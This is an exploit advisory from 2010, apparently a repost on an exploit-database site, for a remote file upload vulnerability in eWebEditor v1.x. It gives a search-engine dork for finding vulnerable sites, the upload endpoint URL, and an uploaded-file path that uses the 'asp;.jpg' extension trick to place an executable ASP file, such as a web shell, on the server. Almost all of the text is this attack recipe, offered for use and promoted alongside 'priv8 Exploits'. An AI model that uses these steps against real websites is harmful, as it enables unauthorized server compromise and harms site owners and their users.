id: 12352
date: 05/22/2010
title: eWebEditor v1.x (WYSIWYG) Remote File Upload Vulnerability
author: Ma3sTr0-Dz
cves: 

==========================================================
eWebEditor v1.x (WYSIWYG) Remote File Upload Vulnerability
==========================================================


# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [eWebEditor v1.x (WYSIWYG) Remote File Upload .]
# Impact..................: [Remote]
# Site Software ..........:[http://www.ewebeditor.net/]
# Sptnx ..................: [CmOs_CLR & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [o5m@hotmail.de]
# Vulnerability: Remote File Upload .
 
 
#
Part ExplOit & Bug Codes :
 
------
Dork :
------
allinurl:ewebeditor/asp/
 
Exploit :
---------
 
http://site.com/[path]/asp/upload.asp?type=file&style=coolblue&language=zh-cn
 
http://site.com/uploads/asp/sec4ever.asp;.jpg
-----------------------
Don't Forget : Www.Sec4ever.com/home /// Ur Secure Mind /



#  0day.today [2023-03-24]  #